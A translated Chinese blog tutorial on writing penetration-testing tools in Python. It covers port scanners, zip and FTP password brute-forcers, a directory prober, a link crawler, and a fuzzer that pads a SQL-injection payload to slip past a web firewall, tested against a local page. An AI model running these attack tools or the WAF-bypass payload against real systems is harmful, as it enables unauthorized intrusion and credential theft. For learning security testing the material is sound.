Building Your Own Penetration Testing Toolkit with Python

Python is an easy language to pick up, and its powerful third-party libraries let us get twice the result with half the effort. Today let's look at how Python can be used in penetration testing and build our own toolkit by hand.

Difficulty: ★★★
Topics: Python; web security
Author: xiaoye
Source: i春秋 (ichunqiu)
Keywords: network penetration techniques

1. Information Gathering: A Small Python Port-Scanning Script
Port scanning is a common technique in penetration testing: find sensitive ports, then try weak or default credentials against them. I put this little script together while teaching myself Python.
The port-scanning script:

#coding: utf-8
import socket
import time
  
def scan(ip, port):
    try:
        socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((ip, port))
        return True
    except:
        return
  
def scanport():
    print '做者:xiaoye'.decode('utf-8').encode('gbk')
    print '--------------'
    print 'blog: http://blog.163.com/sy_butian/blog'
    print '--------------'
    ym = raw_input('請輸入域名(只對未使用cdn的網站有效):'.decode('utf-8').encode('gbk'))
    ips = socket.gethostbyname(ym)
    print 'ip: %s' % ips
    portlist = [80,8080,3128,8081,9080,1080,21,23,443,69,22,25,110,7001,9090,3389,1521,1158,2100,1433]
    starttime = time.time()
    for port in portlist:
          
        res = scan(ips, port)
        if res :
            print 'this port:%s is on' % port
    endtime = time.time()
    print '本次掃描用了:%s秒'.decode('utf-8').encode('gbk') % (endtime-starttime)
  
  
if __name__ == '__main__':
    scanport()

There are actually many kinds of port-scanning techniques; most of them play with the TCP three-way handshake (diagram borrowed from the web).

[Figure 1: the TCP three-way handshake]

The script above uses TCP connect(), i.e. it completes the full TCP three-way handshake and decides whether a port is open from whether the handshake succeeds. This full-connect scan is fairly accurate, but it leaves a large number of connection traces on the server.

Of course, if we'd rather not leave so many traces, we can send an RST instead of the final ACK of the handshake, tearing the connection down. Since the connection is never fully established, no trace is left, but this approach requires root privileges.
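
A hedged sketch of that half-open (SYN) approach using scapy follows; scapy is not used anywhere in the original scripts, and the target address and port list here are placeholders of mine. It has to be run as root:

#coding: utf-8
# Sketch only: a SYN (half-open) scan with scapy; requires root and the scapy package
from scapy.all import IP, TCP, sr1, send, conf

conf.verb = 0   # keep scapy quiet

def syn_scan(ip, port):
    # send a SYN and wait for the reply
    resp = sr1(IP(dst=ip)/TCP(dport=port, flags='S'), timeout=2)
    if resp is not None and resp.haslayer(TCP) and resp[TCP].flags == 0x12:
        # got SYN/ACK: port is open; answer with RST so no full connection is made
        send(IP(dst=ip)/TCP(dport=port, flags='R'))
        return True
    return False

if __name__ == '__main__':
    for port in [21, 22, 80, 443, 3389]:
        if syn_scan('192.168.1.1', port):    # placeholder target
            print 'this port:%s is on' % port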

OK, let's first walk through our Python port-scanning script.

Core code:

portlist = [80,8080,3128,8081,9080,1080,21,23,443,69,22,25,110,7001,9090,3389,1521,1158,2100,1433]
for port in portlist:
          
        res = scan(ips, port)
        if res :
            print 'this port:%s is on' % port

This code defines the list of ports to scan and walks through it with for .. in ..

socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((ip, port))

This code uses the socket module to establish the TCP connection; socket.socket() is shorthand for s = socket.socket(socket.AF_INET, socket.SOCK_STREAM), i.e. a TCP socket.
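
A small aside of my own, not part of the original script: socket also offers connect_ex, which returns an error code instead of raising, and closing the socket explicitly avoids leaving descriptors around:

#coding: utf-8
import socket

def scan(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(3)
    try:
        # connect_ex returns 0 on success instead of raising an exception
        return s.connect_ex((ip, port)) == 0
    finally:
        s.close()

if __name__ == '__main__':
    print scan('127.0.0.1', 80)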

2. Practical Brute-Force Scripts: Archive Passwords && FTP
For compressed archives Python has its own zipfile module. Violent Python has example code for zipfile, and I wrote this small script modeled on the book:

#coding: utf-8
'''
z = zipfile.ZipFile('') , extractall
z.extractall(pwd)
'''
import zipfile
import threading
 
def zipbp(zfile, pwd):
        try:
                zfile.extractall(pwd=pwd)
                print 'password found : %s' % pwd
        except:
                return
def main():
        zfile = zipfile.ZipFile('xx.zip')
        pwdall = open('dict.txt')
        for pwda in pwdall.readlines():
                pwd = pwda.strip('\n')
                t = threading.Thread(target=zipbp, args=(zfile, pwd))
                t.start()
                #t.join()
if __name__ == '__main__':
        main()

The script itself is very simple; the core is just one spot:

zfile = zipfile.ZipFile('xx.zip')
..............
zfile.extractall(pwd=pwd)

ZipFile is the central class of the zipfile module and zfile is an instance of it; extractall(pwd) is the method that handles password-protected archives, and extraction only succeeds when pwd is correct. The script simply loads a dictionary and keeps feeding candidate passwords to this method until one works and the crack succeeds.
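
One possible tweak, offered only as a sketch and not part of the original script: rather than extracting the whole archive for every candidate, read a single member, which fails just as reliably on a wrong password but writes nothing to disk:

#coding: utf-8
import zipfile

def try_pwd(zfile, name, pwd):
    # read one member only; a wrong password raises an exception
    try:
        zfile.read(name, pwd)
        print 'password found : %s' % pwd
        return True
    except Exception:
        return False

if __name__ == '__main__':
    zfile = zipfile.ZipFile('xx.zip')
    name = zfile.namelist()[0]
    for line in open('dict.txt'):
        if try_pwd(zfile, name, line.strip('\n')):
            break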

Python is just as handy for brute-forcing other services. Take FTP: the ftplib module handles it, and a typical FTP session looks like this:

ftp = ftplib.FTP()
ftp.connect(host, 21, 9)
ftp.login(user, pwd)
ftp.retrlines('LIST')
ftp.quit()

connect(ip, port, timeout) establishes the FTP connection; login(user, pwd) logs in; retrlines('LIST') retrieves the text output of the LIST command run on the server; quit() closes the connection.

Notice how similar the pattern is to zipfile? Exactly: once you can write one of these, you can write the other, and plenty more brute-force scripts besides. I won't post my script; try writing it yourself. (p.s. for FTP brute-forcing, before loading a dictionary, try an anonymous login first, i.e. ftp.login() with no arguments — you might get lucky.)
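
For reference, a minimal sketch of that exercise; the target address, the user name and dict.txt are placeholders of mine, not values from the original:

#coding: utf-8
import ftplib

def ftp_login(host, user, pwd):
    try:
        ftp = ftplib.FTP()
        ftp.connect(host, 21, 9)
        ftp.login(user, pwd)
        ftp.quit()
        return True
    except ftplib.all_errors:
        return False

if __name__ == '__main__':
    host = '192.168.1.10'              # placeholder target
    if ftp_login(host, '', ''):        # empty credentials -> anonymous login
        print 'anonymous login ok'
    else:
        for line in open('dict.txt'):
            pwd = line.strip('\n')
            if ftp_login(host, 'admin', pwd):   # placeholder user name
                print 'password found : %s' % pwd
                break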

3. Directory Probing: A Low-Budget Python Version of 御劍
Yesterday I wrote a small script for probing directories, aiming for the same effect as 御劍 (Yujian). It works and it is multithreaded, but it is still quite slow; I'll revise it later:

#coding: utf-8
import sys
import requests
import threading
 
def savetxt(url):
        with open('domain.txt', 'a') as f:
                url = url + '\n'
                f.write(url)
 
def geturl(url):
        r = requests.get(url, timeout=1)
        status_code = r.status_code
        if status_code == 200:
                print url + ' 200 ok'
                savetxt(url)
        #print url 
        #print status_code
         
syslen = len(sys.argv)
#print syslen
#res=[]
url = raw_input('請輸入要掃描目錄的網站\n'.decode('utf-8').encode('gbk'))
for i in range(1,syslen):
        with open(sys.argv[i], 'r') as f:
                for fi in f.readlines():
                        fi = fi.strip('\n')
                        #print fi
                        fi = url + '/' + fi
                        #print fi
                        t = threading.Thread(target=geturl, args=(fi,))
                        t.start()
                        t.join()  # joining each thread right after starting it makes the scan effectively single-threaded, hence the slowness
#res = ''.join(res)
#print res

 

[Figure 2: the directory scanner running]

It runs, just slowly.

Here's the main idea; I'll explain in more detail once I've reworked it:

Load one or more dictionaries and join each entry onto the input URL to build complete URLs.

Loading multiple dictionaries is implemented like this:

syslen = len(sys.argv)
#print syslen
#res=[]
url = raw_input('請輸入要掃描目錄的網站\n'.decode('utf-8').encode('gbk'))
for i in range(1,syslen):
        with open(sys.argv[i], 'r') as f:
                for fi in f.readlines():
                        fi = fi.strip('\n')
                        #print fi
                        fi = url + '/' + fi

Thanks to sys.argv, running python yujian.py dir.txt loads dir.txt; if we pass dir.txt php.txt then, because of for i in range(1,syslen):, syslen is 3 and range(1,3) returns [1, 2];

so with open(sys.argv[i], 'r') as f: automatically loads both txt files we passed in (sys.argv[1] and sys.argv[2]). In other words, however many files we supply, that's how many dictionaries it loads.

When we come across a PHP site, we can simply borrow 御劍's dictionaries and load only php.txt and dir.txt, exactly as we would with 御劍 itself:

[Figure 3: loading 御劍's php.txt and dir.txt dictionaries]

The script uses the status code returned by Python's requests.get(url) to decide whether a URL exists;
if it comes back 200, the URL is printed and also written to a txt file.
That's the idea for now.
———————————————————————–

Update: a multithreaded, queue-based directory probing script: https://github.com/xiaoyecent/scan_dir
For more small scripts, see https://github.com/xiaoyecent. So far there are scripts for collecting Baidu search URLs, collecting and validating proxy IPs, crawling, simple discovery of live hosts on a subnet, and more. I'm just a beginner sharing to learn, so please go easy.
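
As a rough illustration of the queue-plus-workers pattern (a sketch of the general idea, not the code actually published in that repo), worker threads pull paths from a shared Queue, so start()/join() no longer serializes the requests; the target URL and dir.txt below are placeholders:

#coding: utf-8
import threading
import Queue
import requests

q = Queue.Queue()

def worker(url):
    while True:
        try:
            path = q.get_nowait()       # grab the next path, stop when the queue is empty
        except Queue.Empty:
            return
        try:
            r = requests.get(url + '/' + path, timeout=3)
            if r.status_code == 200:
                print url + '/' + path + ' 200 ok'
        except requests.RequestException:
            pass

if __name__ == '__main__':
    url = 'http://www.example.com'      # placeholder target
    for line in open('dir.txt'):
        q.put(line.strip('\n'))
    threads = [threading.Thread(target=worker, args=(url,)) for _ in range(20)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()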


4. A Crawler for Collecting a Site's Links
This crawler comes from 螞蟻老師's course on 慕課網 (imooc), which I thought was excellent, so I adapted it. It was originally written to crawl 1000 Python-related entries on Baidu Baike (that still works; if the target changes later, a new crawl strategy will be needed, but the overall framework stays the same). I changed it to collect all of a site's links, and it remains very extensible.
The basic components of a crawler (borrowing a diagram from 螞蟻老師):

[Figure 4: crawler architecture — scheduler, URL manager, downloader, parser, outputer]

1. Scheduler: coordinates all the other parts — it takes a URL out, hands it to the downloader, passes the downloaded page to the parser, and collects the new URLs and the data the parser extracts.
2. URL manager: maintains two set()s (why set()? because it deduplicates for free): one for URLs already crawled and one for URLs still to crawl. It also provides methods such as adding the new URLs found by the parser to the to-crawl set.
3. Downloader: the simplest part — for a static page, r = requests.get followed by r.content puts the page content in memory (storing it in a database works too). It is also the main extension point: pages that require a login need you to POST credentials or attach the cookie from an existing session (see the sketch after this list).
4. Parser: BeautifulSoup, regular expressions, or the pyquery approach binghe favours, used to parse the pages the downloader fetched.
5. Outputer: outputs the data we want.
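
A hedged sketch of that login case: requests.Session() keeps cookies across requests, so a page behind a login can be fetched after posting credentials once. The login URL and form field names below are made up for illustration:

#coding: utf-8
import requests

# a Session object remembers cookies between requests
s = requests.Session()

# log in once; the URL and form fields are placeholders
s.post('http://www.example.com/login',
       data={'username': 'admin', 'password': 'secret'}, timeout=3)

# later downloads automatically carry the session cookie
r = s.get('http://www.example.com/member/index.php', timeout=3)
print r.status_code
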
Scheduler:
spider_main.py

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
 
from spider import url_manager, html_downloader, html_outputer, html_parser
 
 
class SpiderMain(object):
 
    def __init__(self):
        self.urls = url_manager.UrlManager()
        self.downloader = html_downloader.HtmlDownloader()
        self.parser = html_parser.HtmlParser()
        self.outputer = html_outputer.HtmlOutputer()
 
 
 
    def craw(self, root_url):
         
        self.urls.add_new_url(root_url)
        while self.urls.has_new_url():
            try :
                new_url = self.urls.get_new_url()
                print 'craw : %s' % new_url
                html_cont = self.downloader.download(new_url)
                new_urls, new_data = self.parser.parse(new_url, html_cont)
                self.urls.add_new_urls(new_urls)
                self.outputer.collect_data(new_data)
 
            except:
                print 'craw failed'
 
        self.outputer.output_html()
 
if __name__ == "__main__":
    root_url = "the site you want to crawl"  # I tried it on 愛編程 and the results were decent
    obj_spider = SpiderMain()
    obj_spider.craw(root_url)

__init__ does the initialization; url_manager, html_downloader, html_outputer and html_parser are modules I wrote myself, each with its own class and methods, and the initializer creates an instance of each class.
craw is where the scheduler drives the other modules:

new_url = self.urls.get_new_url()
                print 'craw : %s' % new_url
                html_cont = self.downloader.download(new_url)
                new_urls, new_data = self.parser.parse(new_url, html_cont)
                self.urls.add_new_urls(new_urls)
                self.outputer.collect_data(new_data)

These lines correspond to:
1. Take a URL out of the to-crawl list
2. Hand that URL to the downloader, which returns the page content
3. Hand the page to the parser, which returns new URLs and the data we want
4. Ask the URL manager to add the new URLs to the to-crawl list
5. Ask the outputer to collect the data

URL manager:
url_manager.py:

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
class UrlManager(object):
    def __init__(self):
        self.new_urls = set()
        self.old_urls = set()
 
    def add_new_url(self, url):
        if url is None:
            return
        if url not in self.new_urls and url not in self.old_urls:
            self.new_urls.add(url)
 
    def add_new_urls(self, urls):
        if urls is None or len(urls) == 0:
            return
        for url in urls:
            self.add_new_url(url)
 
    def has_new_url(self):
        return len(self.new_urls) != 0
 
 
    def get_new_url(self):
        new_url = self.new_urls.pop()
        self.old_urls.add(new_url)
        return new_url

This is the class in the url_manager module, along with its methods.

Downloader:
html_downloader.py
螞蟻老師 originally used urllib here; I switched it to requests:

 

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import requests
 
 
class HtmlDownloader(object):
 
    def download(self, url):
        if url is None:
            return None
        r = requests.get(url,timeout=3)
        if r.status_code != 200:
            return None
        return r.content

HTML parser:
html_parser.py
I changed the crawl strategy: it now extracts every link, i.e. the href value of every a tag.

 

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import re
import urlparse
 
from bs4 import BeautifulSoup
 
 
class HtmlParser(object):
 
    def parse(self, page_url, html_cont):
        if page_url is None or html_cont is None:
            return
 
        soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
        new_urls = self._get_new_urls(page_url, soup)
        new_data = self._get_new_data(page_url, soup)
        return new_urls, new_data
 
    def _get_new_urls(self, page_url, soup):
        new_urls = set()
        links = soup.find_all('a')
        for link in links:
            new_url = link['href']
            new_full_url = urlparse.urljoin(page_url, new_url)
            new_urls.add(new_full_url)
        return new_urls
 
 
    def _get_new_data(self, page_url, soup):
        res_data = {}

        # record the page's own url so the outputer's data['url'] has something to write
        res_data['url'] = page_url

        return res_data

html_outputer.py
This one is optional depending on what you need; the data can already be printed either way:

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
class HtmlOutputer(object):
 
    def __init__(self):
        self.datas = []
 
 
    def collect_data(self, data):
        if data is None:
            return
        self.datas.append(data)
 
    def output_html(self):
        fout = open('output.html', 'w')
        fout.write("<html>")
        fout.write("<body>")
        fout.write("<table>")
 
        for data in self.datas:
            fout.write("<tr>")
            fout.write("<td>%s</td>" % data['url'])
            #fout.write("<td>%s</td>" % data['title'].encode('utf-8'))
            #fout.write("<td>%s</td>" % data['summary'].encode('utf-8'))
            fout.write("</tr>")
        fout.write("</table>")
        fout.write("</body>")
        fout.write("</html>")
        fout.close()

Result of a run:

[Figure 5: crawler output]

This crawler is quite extensible; you can extend it later to collect whatever content you're after.
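
For instance, as a sketch of one possible extension (my own suggestion, not part of the original), the _get_new_data method in html_parser.py could also record the page title, which the outputer's commented-out line already knows how to write:

    def _get_new_data(self, page_url, soup):
        res_data = {}
        res_data['url'] = page_url
        # hypothetical extension: also keep the page <title> when there is one
        if soup.title is not None:
            res_data['title'] = soup.title.get_text()
        return res_data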

Of course, if all you need is a few pieces of data from a single page, none of this machinery is necessary; a small script will do. For example, to scrape the subdomain results from a subdomain-lookup page:

#coding: utf-8
  
import urllib, re
  
def getall(url):
    page = urllib.urlopen(url).read()
    return page
  
def ressubd(all):
    a = re.compile(r'value="(.*?.com|.*?.cn|.*?.com.cn|.*?.org| )"><input')
    subdomains = re.findall(a, all)
    return (subdomains)
  
if __name__ == '__main__':
    print '做者:深夜'.decode('utf-8').encode('gbk')
    print '--------------'
    print 'blog: http://blog.163.com/sy_butian/blog'
    print '--------------'
    url = 'http://i.links.cn/subdomain/' + raw_input('請輸入主域名:'.decode('utf-8').encode('gbk')) + '.html'
    all = getall(url)
    subd = ressubd(all)
    sub = ''.join(subd)
    s = sub.replace('http://', '\n')
    print s
    with open('url.txt', 'w') as f:
        f.writelines(s)

For a one-off script like this a regex is enough, and it's quick to write.

5. Python in Exploit Development
A while back 海盜表哥 wrote a PHP fuzzing script for getting past 安全狗 (Safedog):
http://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=16134
Here is his PHP version:

 

<?php
$i = 10000;
$url = 'http://192.168.1.121/sqlin.php';

for (;;) {
    $i++;

    echo "$i\n";

    $payload = 'id=-1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))) and 1=' . str_repeat('3', $i);
    $ret = doPost($url, $payload);

    if (!strpos($ret, '網站防火牆')) {
        echo "done!\n" . strlen($payload) . "\n" . $ret;
        die();
    }
}

function doPost($url, $data = '') {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    $return = curl_exec($ch);
    curl_close($ch);
    return $return;
}

I set up a local test environment and rewrote it in Python as well; it was quite straightforward:

 

#coding: utf-8
import requests, os
#i = 9990;
url = 'http://localhost:8090/sqlin.php'
 
def dopost(url, data=''):
        r = requests.post(url, data)
        return r.content
 
for i in range(9990, 10000):
        payload = {'id':'1 and 1=' + i * '3' + ' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))'}
        #print payload
        ret = dopost(url, payload)
        ret = ''.join(ret)
        if ret.find('網站防火牆') == -1:
                print "done\n" + "\n" + ret
                exit(0)

6. Wrap-up
Being a student is rough — my exams don't finish until January 15th. That's all for now; this article took two hours to write and I need to get back to revising. If any of you have opinions or suggestions, feel free to share them, and I'll fix anything in the article that turns out to be wrong.
